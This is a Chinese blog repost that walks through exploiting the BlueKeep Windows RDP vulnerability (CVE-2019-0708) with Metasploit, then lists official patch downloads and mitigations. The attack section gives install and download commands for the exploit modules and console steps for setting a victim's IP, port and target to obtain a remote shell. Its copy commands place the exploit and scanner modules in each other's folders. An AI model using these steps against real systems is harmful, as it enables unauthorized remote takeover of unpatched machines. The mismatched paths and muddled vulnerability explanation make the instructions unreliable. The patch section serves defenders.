[Shell]CVE-2019-0708漏洞復現及修復補丁


0x01 漏洞原理

Windows系列服務器於2019年5月15號,被爆出高危漏洞,該漏洞影響范圍較廣,windows2003、windows2008、windows2008 R2、windows 7系統都會遭到攻擊,該服務器漏洞利用方式是通過遠程桌面端口3389,RDP協議進行攻擊的。

這個漏洞是今年來說危害嚴重性最大的漏洞,跟之前的勒索,永恆之藍病毒差不多。

CVE-2019-0708漏洞是通過檢查用戶的身份認證,導致可以繞過認證,不用任何的交互,直接通過rdp協議進行連接發送惡意代碼執行命令到服務器中去。如果被攻擊者利用,會導致服務器入侵,中病毒,像WannaCry 永恆之藍漏洞一樣大規模的感染。

2019年9月7日晚上凌晨1點左右,metaspolit更新了漏洞利用程序

未經身份驗證的攻擊者利用該漏洞,向目標Windows主機發送惡意構造請求,可以在目標系統上執行任意代碼。

0x02 受影響版本

Windows 7

Windows Server 2008 R2

Windows Server 2008

Windows Server 2003

我在復現的時候只有win7 sp1Windows 2008 sp1可以復現成功,其它的要么就是打到藍屏,要么就是打到ruby重置連接。

Windows 2008 sp1需要修改注冊表[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\rdpwd\fDisableCam]值修改為0

0x03 復現准備

攻擊工具准備

1.使用如下命令一鍵安裝metasploit-framework

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

2.下載exp利用腳本

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

3.將下載好的攻擊套件放置到msf的相應文件夾(如果已存在同名文件,直接覆蓋即可。如果么有相應的文件夾,mkdir一下就好了)

cp rdp.rb /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/

cp rdp_scanner.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/

cp cve_2019_0708_bluekeep_rce.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/

cp cve_2019_0708_bluekeep.rb /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/

4.使用msfconsole進入metasploit-framework。使用reload_all重新加載0708rdp利用模塊

0x04 漏洞復現

  1. use
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

啟用0708RDP攻擊模塊

2.info

可見關鍵設置主要為RHOSTS\ RPORT \ target

3.set

其中RDP_CLIENT_IP為已經連接上要攻擊的服務器的客戶端ip地址

使用set RHOSTS 受害機IP設置受害機IP
使用set RPORT 受害機PORT設置受害機RDP端口號
使用set target ID數字(可選為0-4)設置受害機機器架構

這里我們使用的是VMware Fusion,那么target 3滿足條件
使用exploit開始攻擊,等待建立連接

4.shell
成功建立連接,獲取到shell

0x05 修復補丁以及安全建議

有些windows2008系統打不了補丁的一般是數據中心版本,可以設置一下服務器,計算機右鍵屬性-遠程設置-僅允許運行使用網絡基本身份驗證的遠程桌面的計算機連接(更安全)(N),在這行點勾,然后確認即可,可以臨時的防止漏洞的攻擊。

如果對補丁不知道該如何修復的,可以啟用阿里雲的端口安全策略,禁止掉3389遠程端口,只允許自己的IP通信即可。

1.Windows Server 2008 漏洞補丁系列下載地址

Windows Server 2008 32位系統:

http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.0-kb4499149-x86_832cf179b302b861c83f2a92acc5e2a152405377.msu

Windows Server 2008 x64位系統:

http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.0-kb4499149-x64_9236b098f7cea864f7638e7d4b77aa8f81f70fd6.msu

Windows Server 2008 R2 Itanium系統:

http://download.windowsupdate.com/c/msdownload/update/software/secu/2019/05/windows6.1-kb4499175-ia64_fabc8e54caa0d31a5abe8a0b347ab4a77aa98c36.msu

Windows Server 2008 R2 x64系統:

http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.1-kb4499175-x64_3704acfff45ddf163d8049683d5a3b75e49b58cb.msu

Windows Server 2008 Itanium:

http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.0-kb4499180-ia64_805e448d48ab8b1401377ab9845f39e1cae836d4.msu

2.Windows Server 2003 漏洞補丁系列下載地址

Windows Server 2003 32位系統:

http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsserver2003-kb4500331-x86-custom-chs_4892823f525d9d532ed3ae36fc440338d2b46a72.exe

Windows Server 2003 64位系統:

http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsserver2003-kb4500331-x64-custom-chs_f2f949a9a764ff93ea13095a0aca1fc507320d3c.exe

3.Windows XP 漏洞補丁系列下載地址

Windows XP SP3 32位系統:

http://download.windowsupdate.com/c/csa/csa/secu/2019/04/windowsxp-kb4500331-x86-custom-chs_718543e86e06b08b568826ac13c05f967392238c.exe

Windows XP SP2 64位系統:

http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsserver2003-kb4500331-x64-custom-enu_e2fd240c402134839cfa22227b11a5ec80ddafcf.exe

Windows XP SP3 for XPe:

http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsxp-kb4500331-x86-embedded-custom-chs_96da48aaa9d9bcfe6cd820f239db2fe96500bfae.exe

0x06 參考鏈接

https://github.com/rapid7/metasploit-framework/pull/12283/files

http://blog.xkkhh.cn/archives/535

https://qiita.com/shimizukawasaki/items/024b296a4c9ae7c33961?from=groupmessage


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM